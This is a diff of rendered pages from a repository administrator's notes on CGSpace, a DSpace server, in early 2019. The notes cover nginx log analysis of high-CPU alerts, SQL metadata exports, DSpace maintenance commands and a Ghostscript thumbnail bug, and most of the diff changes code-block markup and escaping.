176 2003:d5:fbda:1c00:1106:c7a0:4b17:3af8
189 107.21.16.70
@ -939,12 +939,12 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<li>35.237.175.180 is known to us</li>
<li>I don&rsquo;t think we&rsquo;ve seen 196.191.127.37 before. Its user agent is:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/7.0.185.1002 Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/7.0.185.1002 Safari/537.36
</code></pre><ul>
<li>Interestingly this IP is located in Addis Ababa&hellip;</li>
<li>Another interesting one is 154.113.73.30, which is apparently at IITA Nigeria and uses the user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
</code></pre><h2 id="2019-01-23">2019-01-23</h2>
<ul>
<li>Peter noticed that some goo.gl links in our tweets from Feedburner are broken, for example this one from last week:</li>
@ -952,6 +952,7 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/ILRI?src=hash&amp;ref_src=twsrc%5Etfw">#ILRI</a> research: Towards unlocking the potential of the hides and skins value chain in Somaliland <a href="https://t.co/EZH7ALW4dp">https://t.co/EZH7ALW4dp</a></p>&mdash; ILRI.org (@ILRI) <a href="https://twitter.com/ILRI/status/1086330519904673793?ref_src=twsrc%5Etfw">January 18, 2019</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<ul>
<li>The shortened link is <a href="goo.gl/fb/VRj9Gq">goo.gl/fb/VRj9Gq</a> and it shows a &ldquo;Dynamic Link not found&rdquo; error from Firebase:</li>
</ul>
@ -979,13 +980,13 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&amp;rows=0&amp;q=
<p>I got a list of their collections from the CGSpace XMLUI and then used an SQL query to dump the unique values to CSV:</p>
</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/35501', '10568/41728', '10568/49622', '10568/56589', '10568/56592', '10568/65064', '10568/65718', '10568/65719', '10568/67373', '10568/67731', '10568/68235', '10568/68546', '10568/69089', '10568/69160', '10568/69419', '10568/69556', '10568/70131', '10568/70252', '10568/70978'))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/35501&#39;, &#39;10568/41728&#39;, &#39;10568/49622&#39;, &#39;10568/56589&#39;, &#39;10568/56592&#39;, &#39;10568/65064&#39;, &#39;10568/65718&#39;, &#39;10568/65719&#39;, &#39;10568/67373&#39;, &#39;10568/67731&#39;, &#39;10568/68235&#39;, &#39;10568/68546&#39;, &#39;10568/69089&#39;, &#39;10568/69160&#39;, &#39;10568/69419&#39;, &#39;10568/69556&#39;, &#39;10568/70131&#39;, &#39;10568/70252&#39;, &#39;10568/70978&#39;))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
COPY 1109
</code></pre><ul>
<li>Send a mail to the dspace-tech mailing list about the OpenSearch issue we had with the Livestock CRP</li>
<li>Linode sent an alert that CGSpace (linode18) had a high load this morning, here are the top ten IPs during that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2019:0(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2019:0(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
222 54.226.25.74
241 40.77.167.13
272 46.101.86.248
@ -1019,7 +1020,7 @@ COPY 1109
<p>Just to make sure these were not uploaded by the user or something, I manually forced the regeneration of these with DSpace&rsquo;s <code>filter-media</code>:</p>
</li>
</ul>
<pre><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace filter-media -v -f -i 10568/98390
<pre tabindex="0"><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace filter-media -v -f -i 10568/98390
$ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace filter-media -v -f -i 10568/98391
</code></pre><ul>
<li>Both of these were successful, so there must have been an update to ImageMagick or Ghostscript in Ubuntu since early 2018-12</li>
@ -1034,17 +1035,17 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace fi
<li>I re-compiled Arch&rsquo;s ghostscript with the patch and then I was able to generate a thumbnail from one of the <a href="https://cgspace.cgiar.org/handle/10568/98390">troublesome PDFs</a></li>
<li>Before and after:</li>
</ul>
<pre><code>$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
<pre tabindex="0"><code>$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
zsh: abort (core dumped) identify Food\ safety\ Kenya\ fruits.pdf\[0\]
$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
Food safety Kenya fruits.pdf[0]=&gt;Food safety Kenya fruits.pdf PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.000u 0:00.000
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1747.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1747.
</code></pre><ul>
<li>I reported it to the Arch Linux bug tracker (<a href="https://bugs.archlinux.org/task/61513">61513</a>)</li>
<li>I told Atmire to go ahead with the Metadata Quality Module addition based on our <code>5_x-dev</code> branch (<a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=657">657</a>)</li>
<li>Linode sent alerts last night to say that CGSpace (linode18) was using high CPU last night, here are the top ten IPs from the nginx logs around that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2019:(18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2019:(18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
305 3.81.136.184
306 3.83.14.11
306 52.54.252.47
@ -1059,7 +1060,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<li>45.5.186.2 is CIAT and 66.249.64.155 is Google&hellip; hmmm.</li>
<li>Linode sent another alert this morning, here are the top ten IPs active during that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;24/Jan/2019:0(4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;24/Jan/2019:0(4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
360 3.89.134.93
362 34.230.15.139
366 100.24.48.177
@ -1073,7 +1074,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</code></pre><ul>
<li>Just double-checking what CIAT is doing; they are mainly hitting the REST API:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;24/Jan/2019:&quot; | grep 45.5.186.2 | grep -Eo &quot;GET /(handle|bitstream|rest|oai)/&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;24/Jan/2019:&#34; | grep 45.5.186.2 | grep -Eo &#34;GET /(handle|bitstream|rest|oai)/&#34; | sort | uniq -c | sort -n
</code></pre><ul>
<li>CIAT&rsquo;s community currently has 12,000 items in it so this is normal</li>
<li>The issue with goo.gl links that we saw yesterday appears to be resolved, as links are working again&hellip;</li>
@ -1102,7 +1103,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Linode sent an email that the server was using a lot of CPU this morning, and these were the top IPs in the web server logs at the time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;27/Jan/2019:0(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;27/Jan/2019:0(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
189 40.77.167.108
191 157.55.39.2
263 34.218.226.147
@ -1132,7 +1133,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</li>
<li>Linode alerted that CGSpace (linode18) was using too much CPU again this morning, here are the active IPs from the web server log at the time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Jan/2019:0(6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Jan/2019:0(6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
67 207.46.13.50
105 41.204.190.40
117 34.218.226.147
@ -1153,7 +1154,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
</li>
<li>Last night Linode sent an alert that CGSpace (linode18) was using high CPU, here are the most active IPs in the hours just before, during, and after the alert:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;28/Jan/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Jan/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
310 45.5.184.2
425 5.143.231.39
526 54.70.40.11
@ -1168,12 +1169,12 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<li>Of course there is CIAT&rsquo;s <code>45.5.186.2</code>, but also <code>45.5.184.2</code> appears to be CIAT&hellip; I wonder why they have two harvesters?</li>
<li><code>199.47.87.140</code> and <code>199.47.87.141</code> is TurnItIn with the following user agent:</li>
</ul>
<pre><code>TurnitinBot (https://turnitin.com/robot/crawlerinfo.html)
<pre tabindex="0"><code>TurnitinBot (https://turnitin.com/robot/crawlerinfo.html)
</code></pre><h2 id="2019-01-29">2019-01-29</h2>
<ul>
<li>Linode sent an alert about CGSpace (linode18) CPU usage this morning, here are the top IPs in the web server logs just before, during, and after the alert:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;29/Jan/2019:0(3|4|5|6|7)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;29/Jan/2019:0(3|4|5|6|7)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
334 45.5.184.72
429 66.249.66.223
522 35.237.175.180
@ -1198,7 +1199,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Got another alert from Linode about CGSpace (linode18) this morning, here are the top IPs before, during, and after the alert:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;30/Jan/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;30/Jan/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
273 46.101.86.248
301 35.237.175.180
334 45.5.184.72
@ -1216,7 +1217,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ul>
<li>Linode sent alerts about CGSpace (linode18) last night and this morning, here are the top IPs before, during, and after those times:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;30/Jan/2019:(16|17|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;30/Jan/2019:(16|17|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
436 18.196.196.108
460 157.55.39.168
460 207.46.13.96
@ -1227,7 +1228,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
1601 85.25.237.71
1894 66.249.66.219
2610 45.5.184.2
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;31/Jan/2019:0(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;31/Jan/2019:0(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
318 207.46.13.242
334 45.5.184.72
486 35.237.175.180
@ -1242,7 +1243,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<li><code>45.5.186.2</code> and <code>45.5.184.2</code> are CIAT as always</li>
<li><code>85.25.237.71</code> is some new server in Germany that I&rsquo;ve never seen before with the user agent:</li>
</ul>
<pre><code>Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)
<pre tabindex="0"><code>Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)
</code></pre><!-- raw HTML omitted -->
@ -1264,15 +1265,15 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>


@ -12,7 +12,7 @@
Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
The top IPs before, during, and after this latest alert tonight were:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -28,7 +28,7 @@ The top IPs before, during, and after this latest alert tonight were:
The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
There were just over 3 million accesses in the nginx logs last month:
# time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
# time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
@ -49,7 +49,7 @@ sys 0m1.979s
Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
The top IPs before, during, and after this latest alert tonight were:
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -65,14 +65,14 @@ The top IPs before, during, and after this latest alert tonight were:
The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
There were just over 3 million accesses in the nginx logs last month:
# time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
# time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
user 0m22.203s
sys 0m1.979s
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -102,12 +102,12 @@ sys 0m1.979s
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -153,7 +153,7 @@ sys 0m1.979s
<p class="blog-post-meta">
<time datetime="2019-02-01T21:37:30+02:00">Fri Feb 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -163,7 +163,7 @@ sys 0m1.979s
<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
<li>The top IPs before, during, and after this latest alert tonight were:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -179,7 +179,7 @@ sys 0m1.979s
<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
<li>There were just over 3 million accesses in the nginx logs last month:</li>
</ul>
<pre><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s
@ -198,7 +198,7 @@ sys 0m1.979s
<ul>
<li>Another alert from Linode about CGSpace (linode18) this morning, here are the top IPs in the web server logs before, during, and after that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Feb/2019:0(1|2|3|4|5)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Feb/2019:0(1|2|3|4|5)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
284 18.195.78.144
329 207.46.13.32
417 35.237.175.180
@ -219,7 +219,7 @@ sys 0m1.979s
<li>This is seriously getting annoying, Linode sent another alert this morning that CGSpace (linode18) load was 377%!</li>
<li>Here are the top IPs before, during, and after that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
325 85.25.237.71
340 45.5.184.72
431 5.143.231.8
@ -234,11 +234,11 @@ sys 0m1.979s
<li><code>45.5.184.2</code> is CIAT, <code>70.32.83.92</code> and <code>205.186.128.185</code> are Macaroni Bros harvesters for CCAFS I think</li>
<li><code>195.201.104.240</code> is a new IP address in Germany with the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
</code></pre><ul>
<li>This user was making 2060 requests per minute this morning&hellip; seems like I should try to block this type of behavior heuristically, regardless of user agent!</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Feb/2019&quot; | grep 195.201.104.240 | grep -o -E '03/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Feb/2019&#34; | grep 195.201.104.240 | grep -o -E &#39;03/Feb/2019:0[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 20
19 03/Feb/2019:07:42
20 03/Feb/2019:07:12
21 03/Feb/2019:07:27
@ -262,7 +262,7 @@ sys 0m1.979s
</code></pre><ul>
<li>At least they re-used their Tomcat session!</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240' dspace.log.2019-02-03 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240&#39; dspace.log.2019-02-03 | sort | uniq | wc -l
1
</code></pre><ul>
<li>This user was making requests to <code>/browse</code>, which is not currently under the existing rate limiting of dynamic pages in our nginx config
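<ul>
<li>As a sketch of that kind of heuristic (counting requests per IP per minute straight from the nginx logs, regardless of user agent), something like this would list every IP/minute pair above an arbitrary threshold of 100 requests:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | awk &#39;{print $1, substr($4, 2, 17)}&#39; | sort | uniq -c | awk &#39;$1 &gt; 100 {print $2, $3, $1}&#39;
</code></pre>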
@ -280,14 +280,14 @@ sys 0m1.979s
<ul>
<li>Generate a list of CTA subjects from CGSpace for Peter:</li>
</ul>
<pre><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=124 GROUP BY text_value ORDER BY COUNT DESC) to /tmp/cta-subjects.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=124 GROUP BY text_value ORDER BY COUNT DESC) to /tmp/cta-subjects.csv with csv header;
COPY 321
</code></pre><ul>
<li>Skype with Michael Victor about CKM and CGSpace</li>
<li>Discuss the new IITA research theme field with Abenet and decide that we should use <code>cg.identifier.iitatheme</code></li>
<li>This morning there was another alert from Linode about the high load on CGSpace (linode18), here are the top IPs in the web server logs before, during, and after that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
589 2a01:4f8:140:3192::2
762 66.249.66.219
889 35.237.175.180
@ -307,7 +307,7 @@ COPY 321
<li>Peter sent me corrections and deletions for the CTA subjects and as usual, there were encoding errors with some accents (Á) in his file</li>
<li>In other news, it seems that the GREL syntax regarding booleans changed in OpenRefine recently, so I need to update some expressions like the one I use to detect encoding errors to use <code>toString()</code>:</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
isNotNull(value.match(/.*\u200A.*/)),
@ -318,17 +318,17 @@ COPY 321
</code></pre><ul>
<li>Testing the corrections for sixty-five items and sixteen deletions using my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> and <a href="https://gist.github.com/alanorth/bd7d58c947f686401a2b1fadc78736be">delete-metadata-values.py</a> scripts:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p 'fuu' -d
$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p &#39;fuu&#39; -d
$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p &#39;fuu&#39; -d
</code></pre><ul>
<li>I applied them on DSpace Test and CGSpace and started a full Discovery re-index:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Peter had marked several terms with <code>||</code> to indicate multiple values in his corrections so I will have to go back and do those manually:</li>
</ul>
<pre><code>EMPODERAMENTO DE JOVENS,EMPODERAMENTO||JOVENS
<pre tabindex="0"><code>EMPODERAMENTO DE JOVENS,EMPODERAMENTO||JOVENS
ENVIRONMENTAL PROTECTION AND NATURAL RESOURCES MANAGEMENT,NATURAL RESOURCES MANAGEMENT||ENVIRONMENT
FISHERIES AND AQUACULTURE,FISHERIES||AQUACULTURE
MARKETING AND TRADE,MARKETING||TRADE
@ -340,21 +340,21 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<ul>
<li>I dumped the CTA community so I can try to fix the subjects with multiple subjects that Peter indicated in his corrections:</li>
</ul>
<pre><code>$ dspace metadata-export -i 10568/42211 -f /tmp/cta.csv
<pre tabindex="0"><code>$ dspace metadata-export -i 10568/42211 -f /tmp/cta.csv
</code></pre><ul>
<li>Then I used <code>csvcut</code> to get only the CTA subject columns:</li>
</ul>
<pre><code>$ csvcut -c &quot;id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]&quot; /tmp/cta.csv &gt; /tmp/cta-subjects.csv
<pre tabindex="0"><code>$ csvcut -c &#34;id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]&#34; /tmp/cta.csv &gt; /tmp/cta-subjects.csv
</code></pre><ul>
<li>After that I imported the CSV into OpenRefine where I could properly identify and edit the subjects as multiple values</li>
<li>Then I imported it back into CGSpace:</li>
</ul>
<pre><code>$ dspace metadata-import -f /tmp/2019-02-06-CTA-multiple-subjects.csv
<pre tabindex="0"><code>$ dspace metadata-import -f /tmp/2019-02-06-CTA-multiple-subjects.csv
</code></pre><ul>
<li>Another day, another alert about high load on CGSpace (linode18) from Linode</li>
<li>This time the load average was 370% and the top ten IPs before, during, and after that time were:</li>
</ul>
